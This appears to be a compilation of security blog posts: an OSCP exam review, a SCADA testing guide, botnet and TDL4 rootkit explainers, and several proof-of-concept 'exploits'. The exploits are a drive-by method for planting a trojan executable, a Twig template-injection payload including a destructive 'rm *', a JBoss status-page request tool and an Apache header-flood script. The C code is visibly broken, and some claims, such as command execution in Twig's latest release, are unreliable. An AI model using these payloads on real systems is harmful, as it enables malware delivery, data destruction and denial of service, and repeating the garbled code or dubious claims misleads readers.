OSCP preparation guide and exam review

Hello guys, this is Jameel nabbo, and here’s my review about Offensive Security certified professional OSCP certification.


I don’t write dummy things and I’ll not waste your time in reading unnecessary stuff.

First, I reserved my seat for 1-month lab time, along with this I work a full-time job and have a wife, also I give some time to my family and I do freelance projects such as mobile/web development.

You can imagine how busy I am 🙂

When I started to set my goals to take it this what I did:

  • I forgot all of my social life.
  • I canceled all of my vacations.
  • I didn’t sleep more than 6 hours even on the weekend.
  • Redbull was my friend, and all the things that contain sugar.

About my background:

I’m coming from full stack development background and have some background in network security, web app pen testing, and hold some security certifications other than OFFSEC’s one.

The company that I joined recently always puts pressures on me in a lot of challenges and honestly, I like that because I win every time under pressure :D, and they have requested OSCP certification recently and they sponsored me for the certification fees.

Preparation Before Lab:

Before buying the lab, I took all Hackthebox machines including the hard ones (Took me lots of time) also took all machines in VulnHub which doesn’t have write-ups (Notice that all machines that related to ARM stuff I skipped them).

Me and my lovely student Selim (14 years old) we created a small team and we was going over Hackthebox machines and he was making lots of fun, i think his existence pushed me to be better. and now we are in position 1 in the middle-east and 50 over the world on Hackthebox 🙂

MY HTB Profile:

Lab preparation:

I got my materials from Offensive Security and took 3 days to complete the Videos, and 2 days to read all PDF contents. (I didn’t do the exercises) also, I wrote a lab report but I didn’t submit it.

During the lab:

I took 35 machines of the public network along with this, took the hardest machines (Ghost, Pain, humble Sufferance J this machine took me 5 days of lab time to break it down, I think I ‘ll never forget it), however I got the text files that allowed me to unblock other networks in the lab, but didn’t have time to go over them.

Making the exam (the impossible mission):

Time taken: 11 hours

Points earned: all machines (100%) points.

Multiple attempts: yes, I took the exam multiple times.

Did you use Metasploit: NO

I call the exam (impossible mission) not only because of difficulty but because I had really pressure in that time other than the exam:

My brother went to the hospital because of an accident after starting the exam.
My lab stopped for 3 hours and a half because of a technical problem in OFFSEC network.
I lost all of my scans and notes twice during the exam by unexpected restart happened to my VM machine.
With that begin said you can imagine what kind of pressure that I had, especially the downtime, however, Offensive Security was generous enough and they gave me 3 hours more after fixing the problem, however, I didn’t use them.


Is the exam hard?

It’s not easy, but for sure it’s hard if you don’t have experience.

How do I know I’m ready for the exam?

It’s pretty simple, create your own exam simulation in (Sat or Sun) and put time limitation for yourself (24 hours), and choose 2 medium, 2 hard machines from VulnHub or hackthebox, and see how you can progress during this simulation time, I’m really serious. And this technique helped me a lot. (if you fail do it again).

How about Buffer Overflow machine?

Take it easy, do the PDF exercise and you’ll be good to go.

What lab time should I take?

I think if you have more than 5 years’ experience go with the one month. Else take the 90 days or 60 days if you can give at least 3 hours daily from your time, please note that this is an estimation and you should have more idea about how much time you can invest in this certification.

Is it worth it to invest time in this certification?

Well, it’s one of the most fun things that I’ve done in my life and for sure Offensive Security deserve your money when it comes to certifications and penetration testing, it’s at 100% the most respectful certification in the cybersecurity industry, at the end it’s not a book you read it and then answer multiple questions and forget them after 1 week of making the exam.

What if I went to the exam multiple times and failed?

Don’t ever give up, this is the real meaning of Try Harder.

Any recommendations for preparations?

Don’t ever take hints instead make lots of researches and try to understand how things works, and when you feel stack take a step back and enumerate again from ground zero.

Also, when you make the exam the most important thing is to stay awake therefore you need to sleep at least 10 hours before your exam’s start time (Again this is very important).

Another thing I want to point on is Windows privilege escalation (See references section), and don’t cheat yourself by using Metasploit during the lab (I assure you it won’t help you during the exam).

Another thing, now OFFSEC exams are protected (And I really appreciate this huge step from OFFSEC since they will take care of cheating).

Any recommendations for time management during the exam?

Yes, don’t spend more than 4 hours of each machine, and remember that, if something doesn’t work then move on, and most importantly don’t make things complex 🙂

Finally: I call this certification (Never give up certification, and you should really Try Harder because simply there’s no easy way, and I learned this the hard way).


For Linux privilege escalation you really don’t need more than G0tM1lk article (Don’t use the automated Linux enumerations scripts, I’ve never used them in the exam or Lab).

I also wrote a simple book and combine all the techniques that I always use for Linux privilege escalation.


For windows privilege escalation you need to fully understand and read the following two links lots of times and you’ll be good to go, by the way when you go with lab you’ll refer to the bellow links multiple times J

Read this Webbook:

If you guys have any questions regarding the OSCP feel free to contact me on Twitter


Good luck,

Browser Silent Exploitation (2018) POC

Since 2010 I was following the browser exploits of (Silent Java drive by) methods and techniques, and after 2016 I’ve never heard of another “silent drive by” on the Markets, but another critical thing came through, Browser Local storage.

This is a working example of a HTML/JavaScript browser storage exploitation.

As an example, to show how an attacker could force any PC system to download a executable file onto the system just directing the victim to visit a webpage no clicks needed.

Unlike the old Java Drive by methods which have been patched for many years, which used jar applets to allow VBS to execute on the local systems browser TMP folder.

This exploit works by using the browser Local Storage abilities, 90% of web browsers have built in Local Storage cache abilities which allow the them to store files onto the system and reference to these files later when re visiting the website. This allows the browser to reload images and video / SWF content of the website faster than it would normally load the content on the webpage by download.

Now when the victim re-visit a website on a browser with Local Storage cache enable by default it will load the website faster than it would loading from the first time. And the web browser will load the website resources from the local system rather than downloading them again.

What this means is when a site is coded to store its video or image data to the browsers Local Storage cache, the browser automatically downloads the file with no user input or knowledge to the end user this file is then stored on their PC.

trojan.exe = is a file the attacker wishes to have the PC download it by viewing the webpage.

extract.exe = the file that when run will extract trojan.exe from the browsers Local Storage cache and execute it.

The thing is for example Firefox stores this Local Storage cache in a SQL database format on the local HDD, It stores this data in such a way that the image files and video files are not directly on the system but rather there base64 encodings of the file are stored here as a database table value to load from later.

Here is where this exploit comes to play 🙂

With this POC example provided in my GitHub Repo you can see it uses simple CSS/JavaScript with html to store an exe file to the browser cache of any visitor to the webpage.

So, any user visiting this page will automatically download the trojan.exe onto their system no user input dialogs or notices the exe file is on their system as soon as page is done loading.

But the file is on their systems browser cache database which now needs to be extracted and ran on the system now that it is downloaded.

This is where the attacker send them the extract.exe

the Trojan.exe file is the file they must now run to have the Trojan.exe downloaded from viewing the webpage be extracted and ran on the system.

The extract.exe as of version 1.0 is only designed to work in this POC.

The extract.exe DOES NOT download any file it makes no internet connection at all – It simply extracts and runs the file that was silently downloaded and placed onto the system from the website viewing.

The advantages of using this method is that the attacker can indeed force any system viewing any site to download the file just by viewing the webpage. This makes the download ad placement of the file onto their system extremely undetectable AT ALL.

This would also allow attackers to force the file onto victim’s system even if they have a strict firewall in place.

POC contents:

Exploit.js = a java script file that will download the virus silently into the system.

Trojan.exe = example of a cmd trojan that will be downloaded.

index.html = a web page that has the malicious content.

Extract.exe = a file to translate the base 64 code and extract it from the browser storage.


Zero Day Twig PHP template engine

Twig is a modern template engine for PHP, its flexible, fast, and secure template engine for PHP.If you have any exposure to other text-based template languages, such as Smarty, Django, or Jinja, you should feel right at home with Twig. It’s both designer and developer friendly by sticking to PHP’s principles and adding functionality useful for templating environments.

ExploitDB link:

Well, Twig {Latest version} is affected to Server-Side Template Injection and {{Command execution}}.


Twig <=2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string”, depends on the vulnerable application, which takes deferent params by GET or POST.


Example: by injecting this in a search param http://localhost/search?search_key={{4*4}} >        Output: 16

2. POC:



OUTPUT: list of files/directories etc….

See the screenshot bellow how its executing the command and printing out the results, this could be also {{ rm * }} which will delete the entire application 🙂

JBoss sensitive information disclosure vulnerability

By requesting the Status File with full param and setting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. Example: http://127.0.01/status?full=true

ExploitDB Link:

Proof of Concept

//  main.c
//  jobss information disclosure POC
//  Created by JameelNabbo  on 2/8/18.
//  Website
//  LAB
//  CopyRight © 2018 Jameel Nabbo. All rights reserved.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    if((hp = gethostbyname(host)) == NULL){
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    if(sock == -1){
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
    return sock;

#define BUFFER_SIZE 1024

int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
    fd = socket_connect(argv[1], atoi(argv[2]));
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
         fprintf(stderr, "%s", buffer);

    shutdown(fd, SHUT_RDWR);
    return 0;

Update to version 4.2.3 or later

How to preform SCADA network SAFE penetration test

SCADA stands for Supervisory Control and Data Acquisition. In very simple terms, SCADA defines a type of control system that is used to control and monitor facilities and industrial infrastructure. Organizations use SCADA systems to automate complex industrial processes, detect and correct problems, and measure trends over time. SCADA systems are used in industries such as water management, building and facility management, traffic management, electric power generation, etc.

SCADA systems support various protocols such as DNP3, ModBus, IEC 60870, BACnet, LonWorks, and EPICS. In this blog post we’ll stick to discussing the ModBus over TCP protocol as it is still widely used in control systems.

ModBus is a serial communication protocol used to communicate with Programmable Logic Controllers (PLCs), which can be used over TCP (port 502). Each device intended to communicate using Modbus is given a unique address. The devices communicate using a master-slave model where only one device (master or slave) can initiate a transaction (called “queries”). A slave is usually the end device on the SCADA network (valve, sensor, or meter reading) which processes information and sends its output to the master.

A ModBus frame consist of target device address (or broadcast address), a function code defining the requested action, data field, and an error checking field. By default, ModBus has no authentication and encryption but can be transported over SSL/TLS to prevent sniffing, spoofing and replay attacks.


The diagram above, a corporate and a SCADA network are separated by a firewall. I assume that firewall rules are properly set and no access to the SCADA network is allowed. The three major components involved in SCADA are:

Human Machine Interface/Controller Machine: Usually a Windows workstation known as master used to manage and control PLCs on the network through client software. If compromised, an attacker gains access to everything on your SCADA network.

Programmable Logic Controller (PLC): A physical system connected with a power supply and network enabled with capability to talk over Ethernet networks. It could have an LCD panel showing controller status, operator messages, etc. In recent times we have seen that PLCs are accessible via web browsers, Telnet, SSH – exposing it to all kinds of application and network layer attacks. If compromised, an attacker can manipulate the input/output of your devices and cause serious damage to the organization.

End Devices (Sensor, Valve or Pump): End devices installed at the remote site. They report to PLCs over communication links such as radio, serial connections, Ethernet or direct modems. If compromised, an attacker can compromise the integrity of the environment.

Note: The above components are standard in every SCADA network. You’d probably discover other devices as well such as database servers, serial device interfaces, etc.


Recently, SCADA systems have moved from proprietary, closed networks and systems to open systems and TCP/IP networks. This has exposed these networks to the same risks that traditional computer networks face. However, this does not necessarily mean that the approach for security assessment remains the same for SCADA assessments.

From my experiences in conducting SCADA assessments, I’ve noticed that every assessment is different, and on each occasion a unique approach is required based on the system functionality and type of industry it is deployed in. In this article I will share my experience performing a SCADA assessment, and discuss what pen testing approach and tools work best for assessing these highly sensitive systems.


How to prepare?

First you have to ask these questions:

  • Are all factory default credentials changed?
  • Are access to PLCs whitelisted to authorized machines only? They should not be reachable from everywhere.
  • Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
  • Is physical access to the SCADA control center restricted?
  • Can you access the internet from the controller machine?
  • Are there any clear text services running on the SCADA network?
  • Does the organization follow a strict password policy?
  • Are the controller machines, workstations and servers patched? Are they running anti-virus software and have application whitelisting enforced?



Practically, the chances that the organization will have a SCADA test/QA environment are slim. So, we assume that you have to perform an assessment on a live network, taking into account all due care. It is advisable to be prepared before the start of an assessment and ensure that all stakeholders receive communications during each phase of testing. The high-level approach to perform a SCADA assessment includes:


Draw a network map and understand the layout:

The primary purpose of studying the network architecture is to logically understand how each component of the SCADA environment relates to each other (beware, this will be highly complex). You should understand what components are involved and how are they segregated, connected or exposed into the wider network. This phase also involves identification of various subnets present within the network. It is important to find out whether the corporate network is separated from the SCADA network or not.



Plan your Attack carefully (it’s not a normal IT level- simple error or an out of control action may result in a HUGE RISK).

After you gather enough information on what you need to test and what attacks are applicable. I recommend documenting each of the test cases before attacking the target. This will make you more organized when testing extremely sensitive and fragile systems.

Exploitation stage:

Execute each exploit individually. This will help you detect the root cause in case any device unexpectedly experiences failure conditions. If this happens, you should halt testing and inform the customer. You should attempt exploiting each of the components within the SCADA network i.e. network infrastructure, web interfaces, host operating systems, PLCs, HMI, workstations – just as you would do in a traditional network pen-test.


Nessus (But you should control the request timing and preform the scan once for each ip)

smod: ModBus penetration testing framework

plcscan: Python script for scanning PLC devices

NMAP Scripts: NMAP script to scan PLC devices

Wireshark: Network sniffer

mbtget: Perl script to read data from PLC

plcinject: Tool to inject code into PLCs.



SCADA systems are super sensitive and sometimes you may face a SCADA computers that runs Windows XP with 1 G Ram like one of my clients was, so control all your request and monitor the network using WireShark before generating a traffic.


Apache 2.2X denial of service HTTP header request

1. Description

Sending a crafted http header request that contain a dump shellcode in Cookie PARAM will result in printing 400 Bad request and the dump code, apache will display a message (Size of a request header field exceeds server limit) and will take sometime to handle the request,
Sending multiple requests will results in denial of service.

2. Proof of Concept

//Our function that send http requests to the target host
function httpGet(target)

	var dumpShellCode = "0x30, 0x53, 0x76, 0x99, 0xbc, 0xd7, 0x2, 0x34," 
    + "0x39, 0x5e, 0x7b, 0xc8, 0xbd, 0xfa, 0xff, 0x5b,"
    + "0xa2, 0xe7, 0xa, 0x2d, 0x38, 0x51, 0x40, 0x62, "
    + "0xab, 0xd0, 0xf9, 0x6, 0x2f, 0x4c, 0x6d, 0x89, "
    + "0x14, 0x77, 0x5a, 0xbd, 0x68, 0x93, 0x6e, 0xd0,"
    + "0x1d, 0xd2, 0x5f, 0x6c, 0x59, 0x98, 0xf2, 0xd5,"
    + "0x68, 0x69, 0x50, 0x93, 0xa2, 0x7d, 0xbc, 0x1e,"
    + "0xf, 0x64, 0x3d, 0xaa, 0x8b, 0xe8, 0xc9, 0x25, "
    + "0x78, 0x1b, 0x3e, 0xe1, 0x84, 0x9f, 0x4a, 0x7c," 
    + "0x31, 0xf8, 0x1, 0xae, 0x57, 0x52, 0x77, 0x13, "
    + "0xea, 0x8d, 0x94, 0x17, 0x6e, 0xf9, 0x88, 0x2a,"
    + "0xe3, 0x88, 0xb1, 0x3e, 0x67, 0x4, 0x25, 0xc1, "
    + "0x5c, 0x3f, 0xe2, 0xc5, 0xb0, 0x75, 0x59, 0x36," 
    + "0xf7, 0xea, 0xd7, 0xe4, 0x91, 0x6e, 0x53, 0x2f," 
    + "0x4e, 0x11, 0xf8, 0xdb, 0xaa, 0x85, 0x84, 0x66,"
    + "0x47, 0x1c, 0xf5, 0xe2, 0xc3, 0xa0, 0x81, 0x7d," 
    + "0xa0, 0xe5, 0xc, 0x2f, 0x46, 0x47, 0x72, 0xa4, "
    + "0xa9, 0xce, 0xeb, 0x38, 0x2d, 0x6a, 0x6f, 0xcb,"
    + "0xb2, 0xd5, 0xfc, 0x1f, 0x36, 0x61, 0xd0, 0xf2," 
    + "0xbb, 0xe0, 0x49, 0x56, 0x3f, 0xf6, 0x14, 0x37," 
    + "0xe6, 0xe7, 0xca, 0x2d, 0x18, 0x83, 0x5e, 0xc0," 
    + "0xa5";
	//HTTP Request Var 
    var xmlHttp = new XMLHttpRequest(); "GET", "/", false ); // false for synchronous request
    //Now filling the headers information

    //Apache will respond in bad request with the Cookie infomation indicating that apache can't handle the request since its exceed header field limit

    //sending the request
    xmlHttp.send( null );
    return xmlHttp.responseText;


3. Solution:

Update to version 2.4.29

4. Download POC:

Learn how cyber criminals use BotNet

The reality is there are millions of botnet affected computers, and other networking devices are out there, yet to identify any is very hard. As for the end-user, everything seems as it should be, and no issues with connecting to the internet, neither problems on the real PC, however, it might be already turned into a zombie also known as a bot.

More and more compromised computers become bots, larger and more powerful it can become the actual Botnet. What’s happening is that each of the zombie computers is now would call home that would be called a C&C Server – Command & Control. C&C is software. However, it would be on a Server. Therefore people refer to it as a C&C Server.

The attacker now would be able to control from the C&C Server all bots and do as he or she would wishes.

Origin of Botnet

A botnet is so powerful that doesn’t necessarily require to be clicked on, but of course you can find those types of botnets too. The reality is that due to its malware type, Botnet can pick up from social networking sites, e-mails, free software downloads, youtube videos, free movie downloads. Similarly to Spyware, it can be obtained from many sources, and once your computer is affected, it can start to spread around to all your devices that might be on the same network as your modified device. For example, if you have a computer, a laptop, an X-Box, and a mobile phone on your home network and one of them is affected, believe me, all your devices will be affected. It can be self-spreader at some point, however, first when you would download a trusted free software from an untrusted source; it might contain a Botnet, that would be hidden under a Trojan type of virus. It might be in another form such as you receive a dodgy e-mail saying that you have been chosen and won x amount of money, so you must click on the link to claim your winning. Again, while you would click on that link, you wouldn’t realize that the Trojan is already installing itself on your computer. Therefore it’s very dangerous and nearly impossible to know if your PC might be already a Zombie. Additionally can be an infected media, that could be a USB Stick, or nowadays even cheap smartphones bought from China can contain Trojans that would spread around to other networking devices and create a robot network.

Relation between the bot and the C&C Server

Imagine that a torrent movie is effected with a Trojan that would contain a botnet, and there are around 2000 – 4000 people are downloading it every day for the next three months, and eventually, those 300.000 computers would become a bot for a certain robot network. However you might think, how on Earth would all those bots connect to a C&C Server? First of all 300K computers to be on the same botnet is an average number. However, Cyber Security Experts have compromised Botnets previously that was large as 30 million zombie computers called BREDOLAB also was running on an alias as OFICLA. This was a Russian botnet. However it has been now compromised, but the reality is that we just don’t know, at least can not be sure how many Botnets are out there.

So back to the victim’s computer, once the botnet would install itself, called a BOT Binary, it would still have to look for a way to connect itself to the C&C Server to communicate with each other and exchange messages. BOT Binary can contain a hardcoded IP Address that would advertise out to the internet so the C&C Server would find it’s bots. However, there are other methods too. Another common way would be that a particular Domain name is written into the BOT Binary that would be advertised out to find it’s master C&C Server. Either way, once the Zombie computer registers itself to the C&C Server, it will become a BOT officially, and the Robot Network Army begins to grow.

Botnet purpose

There are good intentions too for some who creates and uses such Botnets. However, there are very few as we know yet. And what I heard is that in certain countries certain websites are blocked therefore a few communities are using Botnets to access the information that their government wouldn’t allow them to view according to their law.

The reality is that Botnets are used mainly by the bad guys, but to be more specific, large Underworld Cyber Criminal Organizations.

Similarly to Spyware, once your computer becomes a bot, it could forward all sensitive information to its master – C&C Server that might be usernames, passwords, bank account information, however, the primary purpose of the Botnets are deeper than that.

Some people would only build Botnets so that they could sell it to Cyber Criminals, and larger the botnet is more value it has. Of course, there are certain botnets would contain only bots from the US, or from Europe so those would be a little cheaper. However, large Botnets that has bots all over the worlds in different continents are more expensive. A botnet that would contain a C&C Server and 50-100 bots would be sold between $200 – 800 Dollars, however, it all depends on the locations of the bots too. Now taking this further, large Cyber Criminals have multiple botnets, each would contain 10K + zombie computers, and they would letting them out for an hourly fee, or daily fee. Again it would depend on the requirements, as well the quantity of the bots, and their location, but an average price would be for 5000 bots with C&C Server for 1 hour is around $100, or $1000/Day.

When it comes to a botnet of 5000 bots, you have to understand that not all 5000 zombie computers can be used at the same time, as some of them might be turned off. However, I wanted you to understand the pricing when it comes to a marketplace.

Again back to a purpose of the botnets, some organizations would use it to create a DDoS attack (Distributed Denial of Service) against a particular company, perhaps against their competition, or it could be a revenge of an ex-employee. Either way, botnets can be used for attacks, but more and more it used for financial gain, and that is Bitcoin mining.

Bitcoin mining is very popular, however to mine Bitcoin you must have a huge amount of CPU power combined. Therefore large botnets can be a perfect for this exercise. This process is also known as Silent Bitcoin Mining. However, this must be controlled accurately as for Bitcoin mining all the bots would use 100% CPU. Therefore they would control that so the victims wouldn’t realize that silently their computer (bot) is mining Bitcoin.

Who is the behind the C&C Server?

As I mentioned, all the bots are Centralized and controlled by the C&C Server. Due to the centralized coordination to compromise such robot network the source must be identified and caught. The reality is that such Bot-master would always be very careful and would probably only log into the C&C Server if it’s fully Secured. Of course, there is nothing more than guaranteed then a multi-layered network called TOR.

TOR network would allow the BOT master to be anonymous. Therefore it would remove all traces of his or her identity, that would result in the BOT master to be untraceable.

How to Avoid your computer to become a Zombie?

The answer is simple – back to basics! Do not download software from untrusted sources, even if the software is free you must make sure that you are getting it from the trusted source. Downloading torrents like movies, music, or video games, I would recommend you do not do it, as for the potentials for those items might be affected is very high.

E-mails that advertising things that are too good to be true, DO NOT OPEN them, period.

Your Computer should not remember your username and password/s either. Also in case you buy a new laptop, of desktop computer, you must change the passwords. Furthermore, just be careful, and being reasonable with the information presented to you. For example that you have won 1Million Dollar, so all you have to do is to click on the link to claim it if you didn’t even play anywhere, how would you win anything right!? – So again, do not click on anything that you are unsure of, especially for weird programs that would supposedly help you achieving thinks like hack into someone’s Facebook Account and thinks like that.

You must (PURCHASE NOT CRACK) an Antivirus and update it regularly; second is you should install a Firewall even if it’s virtual, still would help you identify if you are affected. Next, to that, you must always run the latest operating system especially if you have Windows. Normally they do upgrades within their software as they have now found a vulnerability within the previous Operating system, therefore upgrade required to patch those vulnerabilities.

How can a Rootkit bypass Windows 7 operating system’s kernel mode, code signing policy?

Microsoft has introduced a number of security features designed to prevent malicious code from running. But attackers are continually finding ways around those protections, an example is a rootkit that can bypass the Windows driver-signing protection.
The functionality is contained in TDL4,TDSS and Alureon Rootkits:

TDSS has been causing serious trouble for users for more than two years, and is an example of a particularly pernicious type of rootkit that infects the master boot record of a PC.

This type of malware often is referred to as a bootkit and can be extremely difficult to remove once it’s detected. The older versions of TDSS–TDL1, TDL2 and TDL3–are detected by most antimalware suites now, but it’s TDL4 that’s the most problematic.


TDL4 has a specific function that is designed to bypass a protection in Windows 7 and Windows Vista that requires kernel-level code loaded onto a machine to be signed. The Windows kernel-mode code signing policy is mainly applicable on 64-bit machines.

“Starting with Windows Vista, kernel-mode code signing enforcement is
implemented by a component known as Code Integrity. Code Integrity is a
feature that improves the security of the operating system by verifying
the integrity of a file every time that the image of the file is loaded
into memory. The function of Code Integrity is to detect if an unsigned
driver is being loaded into kernel-mode, or if a system binary file has
been modified by malicious code that may have been run by an
administrator,” Microsoft says in its explanation of the functionality.

The TDL4 rootkit has implemented a feature that evades this protection by changing the boot process on protected machines, according to an analysis of TDL4 by Sunbelt Software. The rootkit accomplishes this by going in and modifying which programs Windows will allow to load an unsigned driver.

“The boot option is changed in memory from the code executed by infected
MBR. The boot option configures value of a config setting named
‘LoadIntegrityCheckPolicy’ that determines the level of validation on
boot programs. The rootkit changes this config setting value to a low
level of validation that effectively allows loading of an unsigned
malicious rootkit dll file. The rootkit dll is kdcom.dll, which is an
infected version normal kdcom.dll that ships with Windows,” Sunbelt’s Chandra Prakash wrote in the TDL4 analysis.

“The rootkit also disables debuggers by NOP’ing debugger activation
functions as described below. This makes reverse engineering this rookit
very difficult! The KdDebuggerInitialize1 function
in infected kdcom.dll called during normal execution of the system
installs the rootkit, which hooks the IRP dispatch functions of miniport
driver below the disk to hide its malicious MBR.”

Joe Johnson of Microsoft presented a talk about Alureon at the Virus Bulletin conference, and discussed the low-level capabilities of the rootkit. The presentation addresses the rootkit’s ability to get the Windows kernel to load a fake version of the legitimate kdcom.dll, but says that the malware does not actually bypass Kernel Patch Protection. In fact, it doesn’t have to because KPP doesn’t inspect all loaded drivers, only the code used by the kernel. Alureon patches the Windows Boot Configuration Data to make the machine think that what’s loading is Windows PE, rather than a normal version of Windows, which prevents code integrity checks from being performed.

Earlier versions of the TDL/TDSS rootkit were used in affiliate marketing programs and black hat SEO campaigns. also were part of botnets and had specific functionality designed to hide other malware programs. An analysis of the first three versions of TDL/TDSS by Kaspersky Lab researchers showed that the rootkit is not only quite advanced, but is under continuous development and refinement by a motivated, talented crew.

“Given that the cybercriminals have put considerable effort into
continuing to support this malware, fixing errors, and inventing various
techniques for bypassing signature-based, heuristic and proactive
detecting, TDSS is capable of penetrating a computer even if an
antivirus solution is installed and running. The fact that bot communication with the C&C is encrypted makes
it significantly more difficult to analyze network packets. An extremely
powerful rootkit component hides both the most important malware
components, and the fact that the computer has been infected. The victim
machine becomes part of a botnet, and will have other malware installed
to it. The cybercriminals profit by selling small botnets and using
blackhat SEO,” Sergey Golavanov and Vyacheslav Rusakov wrote. “As long as a malicious program is profitable, cybercriminals will continue to support and develop it.”